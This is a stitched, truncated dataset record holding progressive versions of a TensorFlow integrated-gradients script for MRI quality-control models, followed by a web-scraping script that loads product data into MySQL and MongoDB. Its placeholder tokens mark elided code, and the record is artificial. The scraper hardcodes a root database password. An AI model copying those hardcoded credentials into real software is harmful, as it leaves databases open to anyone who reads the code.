'all-data')\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n volume_shape = 128, 128, 128, n_channels\n element_spec = tf.TensorSpec(shape=(), dtype=tf.int64, name=None), (tf.\n TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None\n ), tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None))\n dataset = tf.data.experimental.load(op.join(device_alldata_dir,\n confusion_class), element_spec=element_spec)\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n print('Computing integrated gradients')\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n ig_attributions = [integrated_gradients(model=model, baseline=\n baseline, image=volume, target_class=target_class, m_steps=128,\n batch_size=1) for volume in volumes]\n if target_class == 1:\n postfix = 'attribution_pass'\n else:\n postfix = 'attribution_fail'\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(ig_dataset, op.join(LOCAL_OUTPUT_DIR,\n f'ig_{confusion_class}_{postfix}'))\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [{'b0': nib.Nifti1Image(volume[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(volume[:, :, :, :3].numpy(),\n affine)} for volume in volumes]\n ig_niftis = [{'b0': nib.Nifti1Image(attribution[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(attribution[:, :, :, :3].numpy\n (), affine), 'sum': nib.Nifti1Image(tf.math.reduce_sum(attribution[\n :, :, :, :4], axis=-1).numpy(), affine)} for attribution in\n ig_attributions]\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis,\n ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{key}_{idx}.nii.gz'))\n for key, value in ig_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{postfix}_{key}_{idx}.nii.gz'))\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gcs_bucket', type=str, help=\n 'The name of the gcs bucket that will contain the saved models, checkpoints, etc.'\n )\n parser.add_argument('--n_channels', type=int, help=\n 'The number of channels in the data.', default=5)\n parser.add_argument('--dataset_name', type=str, help=\n 'The name of the dataset in the tfrecs folder of the GCS bucket.',\n default='b0-tensorfa-dwiqc')\n parser.add_argument('--model_dir', type=str, help=\n 'The name of the GCS directory in which the tensorflow model is saved.'\n , default='b0_tensorfa_dwiqc')\n parser.add_argument('--dataset_seed', type=int, help=\n 'The seed for the dataset', default=8)\n parser.add_argument('--target_class', type=int, help=\n 'The target class for the integrated gradients.', default=1)\n parser.add_argument('--confusion_class', type=str, help=\n 'The confusion class for which to compute integrated gradients',\n default='true_pos')\n args = parser.parse_args()\n main(gcs_bucket=args.gcs_bucket, n_channels=args.n_channels,\n dataset_name=args.dataset_name, model_dir=args.model_dir,\n dataset_seed=args.dataset_seed, target_class=args.target_class,\n confusion_class=args.confusion_class)\n",
"step-4": "import argparse\nimport gc\nimport gcsfs\nimport nibabel as nib\nimport nilearn\nimport nobrainer\nimport numpy as np\nimport os\nimport os.path as op\nimport pandas as pd\nimport tensorflow as tf\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n@tf.function\ndef integrated_gradients(model, baseline, image, target_class, m_steps=50,\n batch_size=32):\n alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)\n gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)\n for alpha in tf.range(0, len(alphas), batch_size):\n from_ = alpha\n to = tf.minimum(from_ + batch_size, len(alphas))\n alpha_batch = alphas[from_:to]\n interpolated_path_input_batch = interpolate_images(baseline=\n baseline, image=image, alphas=alpha_batch)\n gradient_batch = compute_gradients(model=model, images=\n interpolated_path_input_batch, target_class=target_class)\n gradient_batches = gradient_batches.scatter(tf.range(from_, to),\n gradient_batch)\n total_gradients = gradient_batches.stack()\n avg_gradients = integral_approximation(gradients=total_gradients)\n return (image - baseline) * avg_gradients\n\n\ndef main(gcs_bucket, n_channels=5, dataset_name='b0-tensorfa-dwiqc',\n model_dir='b0_tensorfa_dwiqc', dataset_seed=8, target_class=1,\n confusion_class='true_pos'):\n print('Setting gpu thread mode to gpu_private.')\n os.environ['TF_GPU_THREAD_MODE'] = 'gpu_private'\n print('Configuring distribution strategy')\n use_tpu = False\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='')\n tf.config.experimental_connect_to_cluster(resolver)\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n use_tpu = True\n print('TPU detected.')\n print('All devices: ', tf.config.list_logical_devices('TPU'))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print('GPUs detected.')\n print('Number of accelerators: ', strategy.num_replicas_in_sync)\n tf.keras.mixed_precision.set_global_policy('mixed_float16')\n scope = strategy.scope()\n GCS_BASE_PATH = f'gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}'\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, 'saved_model')\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, 'integrated_gradients')\n fs = gcsfs.GCSFileSystem()\n LOCAL_SAVED_MODEL_DIR = 'saved_model'\n LOCAL_OUTPUT_DIR = 'output'\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n GCS_DATA_PATH = f'gs://{gcs_bucket}'\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, 'tfrecs', dataset_name, 'all-data'\n )\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join('.', 'tfrecs', dataset_name, 'all-data')\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n volume_shape = 128, 128, 128, n_channels\n element_spec = tf.TensorSpec(shape=(), dtype=tf.int64, name=None), (tf.\n TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None\n ), tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None))\n dataset = tf.data.experimental.load(op.join(device_alldata_dir,\n confusion_class), element_spec=element_spec)\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n print('Computing integrated gradients')\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n ig_attributions = [integrated_gradients(model=model, baseline=\n baseline, image=volume, target_class=target_class, m_steps=128,\n batch_size=1) for volume in volumes]\n if target_class == 1:\n postfix = 'attribution_pass'\n else:\n postfix = 'attribution_fail'\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(ig_dataset, op.join(LOCAL_OUTPUT_DIR,\n f'ig_{confusion_class}_{postfix}'))\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [{'b0': nib.Nifti1Image(volume[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(volume[:, :, :, :3].numpy(),\n affine)} for volume in volumes]\n ig_niftis = [{'b0': nib.Nifti1Image(attribution[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(attribution[:, :, :, :3].numpy\n (), affine), 'sum': nib.Nifti1Image(tf.math.reduce_sum(attribution[\n :, :, :, :4], axis=-1).numpy(), affine)} for attribution in\n ig_attributions]\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis,\n ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{key}_{idx}.nii.gz'))\n for key, value in ig_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{postfix}_{key}_{idx}.nii.gz'))\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gcs_bucket', type=str, help=\n 'The name of the gcs bucket that will contain the saved models, checkpoints, etc.'\n )\n parser.add_argument('--n_channels', type=int, help=\n 'The number of channels in the data.', default=5)\n parser.add_argument('--dataset_name', type=str, help=\n 'The name of the dataset in the tfrecs folder of the GCS bucket.',\n default='b0-tensorfa-dwiqc')\n parser.add_argument('--model_dir', type=str, help=\n 'The name of the GCS directory in which the tensorflow model is saved.'\n , default='b0_tensorfa_dwiqc')\n parser.add_argument('--dataset_seed', type=int, help=\n 'The seed for the dataset', default=8)\n parser.add_argument('--target_class', type=int, help=\n 'The target class for the integrated gradients.', default=1)\n parser.add_argument('--confusion_class', type=str, help=\n 'The confusion class for which to compute integrated gradients',\n default='true_pos')\n args = parser.parse_args()\n main(gcs_bucket=args.gcs_bucket, n_channels=args.n_channels,\n dataset_name=args.dataset_name, model_dir=args.model_dir,\n dataset_seed=args.dataset_seed, target_class=args.target_class,\n confusion_class=args.confusion_class)\n",
"step-5": "import argparse\nimport gc\nimport gcsfs\nimport nibabel as nib\nimport nilearn\nimport nobrainer\nimport numpy as np\nimport os\nimport os.path as op\nimport pandas as pd\nimport tensorflow as tf\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n # riemann_trapezoidal\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n@tf.function\ndef integrated_gradients(\n model, baseline, image, target_class, m_steps=50, batch_size=32\n):\n # 1. Generate alphas.\n alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)\n\n # Initialize TensorArray outside loop to collect gradients.\n gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)\n\n # Iterate alphas range and batch computation for speed, memory efficiency, and scaling to larger m_steps.\n for alpha in tf.range(0, len(alphas), batch_size):\n from_ = alpha\n to = tf.minimum(from_ + batch_size, len(alphas))\n alpha_batch = alphas[from_:to]\n\n # 2. Generate interpolated inputs between baseline and input.\n interpolated_path_input_batch = interpolate_images(\n baseline=baseline, image=image, alphas=alpha_batch\n )\n\n # 3. Compute gradients between model outputs and interpolated inputs.\n gradient_batch = compute_gradients(\n model=model,\n images=interpolated_path_input_batch,\n target_class=target_class,\n )\n\n # Write batch indices and gradients to extend TensorArray.\n gradient_batches = gradient_batches.scatter(tf.range(from_, to), gradient_batch)\n\n # Stack path gradients together row-wise into single tensor.\n total_gradients = gradient_batches.stack()\n\n # 4. Integral approximation through averaging gradients.\n avg_gradients = integral_approximation(gradients=total_gradients)\n\n # 5. Scale integrated gradients with respect to input.\n return (image - baseline) * avg_gradients\n\n\ndef main(\n gcs_bucket,\n n_channels=5,\n dataset_name=\"b0-tensorfa-dwiqc\",\n model_dir=\"b0_tensorfa_dwiqc\",\n dataset_seed=8,\n target_class=1,\n confusion_class=\"true_pos\",\n):\n print(\"Setting gpu thread mode to gpu_private.\")\n os.environ[\"TF_GPU_THREAD_MODE\"] = \"gpu_private\"\n\n print(\"Configuring distribution strategy\")\n use_tpu = False\n\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=\"\")\n tf.config.experimental_connect_to_cluster(resolver)\n # This is the TPU initialization code that has to be at the beginning.\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n\n use_tpu = True\n print(\"TPU detected.\")\n print(\"All devices: \", tf.config.list_logical_devices(\"TPU\"))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print(\"GPUs detected.\")\n print(\"Number of accelerators: \", strategy.num_replicas_in_sync)\n\n # Train using mixed-precision policy\n tf.keras.mixed_precision.set_global_policy(\"mixed_float16\")\n\n scope = strategy.scope()\n\n # Setting location were training logs and checkpoints will be stored\n GCS_BASE_PATH = f\"gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}\"\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, \"saved_model\")\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, \"integrated_gradients\")\n\n fs = gcsfs.GCSFileSystem()\n\n LOCAL_SAVED_MODEL_DIR = \"saved_model\"\n LOCAL_OUTPUT_DIR = \"output\"\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n\n # Specify the datasets on GCP storage\n GCS_DATA_PATH = f\"gs://{gcs_bucket}\"\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, \"tfrecs\", dataset_name, \"all-data\")\n\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join(\".\", \"tfrecs\", dataset_name, \"all-data\")\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n\n volume_shape = (128, 128, 128, n_channels)\n element_spec = (\n tf.TensorSpec(shape=(), dtype=tf.int64, name=None),\n (\n tf.TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None),\n tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None),\n ),\n )\n\n dataset = tf.data.experimental.load(\n op.join(device_alldata_dir, confusion_class),\n element_spec=element_spec,\n )\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n\n print(\"Computing integrated gradients\")\n\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n\n ig_attributions = [\n integrated_gradients(\n model=model,\n baseline=baseline,\n image=volume,\n target_class=target_class,\n m_steps=128,\n batch_size=1,\n )\n for volume in volumes\n ]\n\n if target_class == 1:\n postfix = \"attribution_pass\"\n else:\n postfix = \"attribution_fail\"\n\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(\n ig_dataset,\n op.join(LOCAL_OUTPUT_DIR, f\"ig_{confusion_class}_{postfix}\"),\n )\n\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [\n {\n \"b0\": nib.Nifti1Image(volume[:, :, :, 3].numpy(), affine),\n \"color_fa\": nib.Nifti1Image(volume[:, :, :, :3].numpy(), affine),\n }\n for volume in volumes\n ]\n ig_niftis = [\n {\n \"b0\": nib.Nifti1Image(attribution[:, :, :, 3].numpy(), affine),\n \"color_fa\": nib.Nifti1Image(attribution[:, :, :, :3].numpy(), affine),\n \"sum\": nib.Nifti1Image(\n tf.math.reduce_sum(attribution[:, :, :, :4], axis=-1).numpy(), affine\n ),\n }\n for attribution in ig_attributions\n ]\n\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis, ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(\n value,\n op.join(LOCAL_OUTPUT_DIR, f\"{confusion_class}_{key}_{idx}.nii.gz\"),\n )\n\n for key, value in ig_nifti.items():\n nib.save(\n value,\n op.join(\n LOCAL_OUTPUT_DIR, f\"{confusion_class}_{postfix}_{key}_{idx}.nii.gz\"\n ),\n )\n\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--gcs_bucket\",\n type=str,\n help=(\n \"The name of the gcs bucket that will contain the saved models, \"\n \"checkpoints, etc.\"\n ),\n )\n parser.add_argument(\n \"--n_channels\",\n type=int,\n help=\"The number of channels in the data.\",\n default=5,\n )\n parser.add_argument(\n \"--dataset_name\",\n type=str,\n help=\"The name of the dataset in the tfrecs folder of the GCS bucket.\",\n default=\"b0-tensorfa-dwiqc\",\n )\n parser.add_argument(\n \"--model_dir\",\n type=str,\n help=\"The name of the GCS directory in which the tensorflow model is saved.\",\n default=\"b0_tensorfa_dwiqc\",\n )\n parser.add_argument(\n \"--dataset_seed\",\n type=int,\n help=\"The seed for the dataset\",\n default=8,\n )\n parser.add_argument(\n \"--target_class\",\n type=int,\n help=\"The target class for the integrated gradients.\",\n default=1,\n )\n parser.add_argument(\n \"--confusion_class\",\n type=str,\n help=\"The confusion class for which to compute integrated gradients\",\n default=\"true_pos\",\n )\n\n args = parser.parse_args()\n\n main(\n gcs_bucket=args.gcs_bucket,\n n_channels=args.n_channels,\n dataset_name=args.dataset_name,\n model_dir=args.model_dir,\n dataset_seed=args.dataset_seed,\n target_class=args.target_class,\n confusion_class=args.confusion_class,\n )\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def insert_category(conn):
"""将商品的种类插入数据库 """
categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):
'相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = (
'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'
)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
result = cursor.execute(sql, (category_id, category_name,
create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = (
'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'
)
res = requests.get(brand_url.format(category_id=category_id))
brands = json.loads(res.content.decode('utf-8')).get('brand_list')
brand_list += brands
except:
print('出错了:category_id:', category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',
'category_id_1']
sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get('brand_id'))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'
)
brand_name = brand.get('brand_name')
brand_name_ch = brand.get('brand_name_ch') if brand.get(
'brand_name_ch') else brand_name
brand_name_en = brand.get('brand_name_en') if brand.get(
'brand_name_en') else brand_name
category_id = int(brand.get('category_id_1'))
category_id = (category_id if category_id in
category_id_list else 1000)
result = cursor.execute(sql, (brand_id, create_time,
brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
brand_set.add(brand_id)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def insert_category(conn):
"""将商品的种类插入数据库 """
categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):
'相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = (
'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'
)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
result = cursor.execute(sql, (category_id, category_name,
create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = (
'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'
)
res = requests.get(brand_url.format(category_id=category_id))
brands = json.loads(res.content.decode('utf-8')).get('brand_list')
brand_list += brands
except:
print('出错了:category_id:', category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',
'category_id_1']
sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get('brand_id'))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'
)
brand_name = brand.get('brand_name')
brand_name_ch = brand.get('brand_name_ch') if brand.get(
'brand_name_ch') else brand_name
brand_name_en = brand.get('brand_name_en') if brand.get(
'brand_name_en') else brand_name
category_id = int(brand.get('category_id_1'))
category_id = (category_id if category_id in
category_id_list else 1000)
result = cursor.execute(sql, (brand_id, create_time,
brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
brand_set.add(brand_id)
def insert_goods(conn, GOODS):
"""将商品信息插入数据库"""
kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',
'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',
'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',
'mart_amount', 'fq_num', 'product_info', 'delivery_time',
'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')
sql = (
'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
)
goods = GOODS.find()
for good in goods:
try:
data = []
for kw in kws[:-5]:
info = good['detail_data'].get(kw)
data.append(info)
gift_list = ' '.join([str(s) for s in good['detail_data'].get(
'gift_list')[-1].values()])
data.append(gift_list)
fe_params = json.dumps(good['detail_data'].get('fe_params'))
data.append(fe_params)
slider_imgs = '||'.join(good['slider_imgs'])
data.append(slider_imgs)
detail_imgs = '||'.join(good['detail_imgs'])
data.append(detail_imgs)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
data.append(create_time)
with conn.cursor() as cursor:
cursor.execute('select brand_id from goods_brand')
all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]
cursor.execute('select category_id from goods_category')
all_category_ids = [category_id[0] for category_id in
cursor.fetchall()]
data[1] = data[1] if data[1] else 1000
data[2] = data[2] if data[2] else 10000
data[1] = 1000 if int(data[1]
) not in all_category_ids else int(data[1])
data[2] = 10000 if int(data[2]) not in all_brand_ids else int(
data[2])
cursor.execute(sql, tuple(data))
conn.commit()
except Exception as e:
print(e)
continue
def main():
conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',
password='123456', db='test', charset='utf8', autocommit=False)
CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)
GOODS = CONN['fenqile']['goods']
insert_goods(conn, GOODS)
conn.close()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def insert_category(conn):
"""将商品的种类插入数据库 """
categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):
'相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = (
'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'
)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
result = cursor.execute(sql, (category_id, category_name,
create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = (
'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'
)
res = requests.get(brand_url.format(category_id=category_id))
brands = json.loads(res.content.decode('utf-8')).get('brand_list')
brand_list += brands
except:
print('出错了:category_id:', category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',
'category_id_1']
sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get('brand_id'))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'
)
brand_name = brand.get('brand_name')
brand_name_ch = brand.get('brand_name_ch') if brand.get(
'brand_name_ch') else brand_name
brand_name_en = brand.get('brand_name_en') if brand.get(
'brand_name_en') else brand_name
category_id = int(brand.get('category_id_1'))
category_id = (category_id if category_id in
category_id_list else 1000)
result = cursor.execute(sql, (brand_id, create_time,
brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
brand_set.add(brand_id)
def insert_goods(conn, GOODS):
"""将商品信息插入数据库"""
kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',
'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',
'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',
'mart_amount', 'fq_num', 'product_info', 'delivery_time',
'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')
sql = (
'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
)
goods = GOODS.find()
for good in goods:
try:
data = []
for kw in kws[:-5]:
info = good['detail_data'].get(kw)
data.append(info)
gift_list = ' '.join([str(s) for s in good['detail_data'].get(
'gift_list')[-1].values()])
data.append(gift_list)
fe_params = json.dumps(good['detail_data'].get('fe_params'))
data.append(fe_params)
slider_imgs = '||'.join(good['slider_imgs'])
data.append(slider_imgs)
detail_imgs = '||'.join(good['detail_imgs'])
data.append(detail_imgs)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
data.append(create_time)
with conn.cursor() as cursor:
cursor.execute('select brand_id from goods_brand')
all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]
cursor.execute('select category_id from goods_category')
all_category_ids = [category_id[0] for category_id in
cursor.fetchall()]
data[1] = data[1] if data[1] else 1000
data[2] = data[2] if data[2] else 10000
data[1] = 1000 if int(data[1]
) not in all_category_ids else int(data[1])
data[2] = 10000 if int(data[2]) not in all_brand_ids else int(
data[2])
cursor.execute(sql, tuple(data))
conn.commit()
except Exception as e:
print(e)
continue
def main():
conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',
password='123456', db='test', charset='utf8', autocommit=False)
CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)
GOODS = CONN['fenqile']['goods']
insert_goods(conn, GOODS)
conn.close()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import json
import datetime
import requests
import pymysql
import pymongo
def insert_category(conn):
"""将商品的种类插入数据库 """
categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):
'相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = (
'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'
)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
result = cursor.execute(sql, (category_id, category_name,
create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = (
'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'
)
res = requests.get(brand_url.format(category_id=category_id))
brands = json.loads(res.content.decode('utf-8')).get('brand_list')
brand_list += brands
except:
print('出错了:category_id:', category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',
'category_id_1']
sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get('brand_id'))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
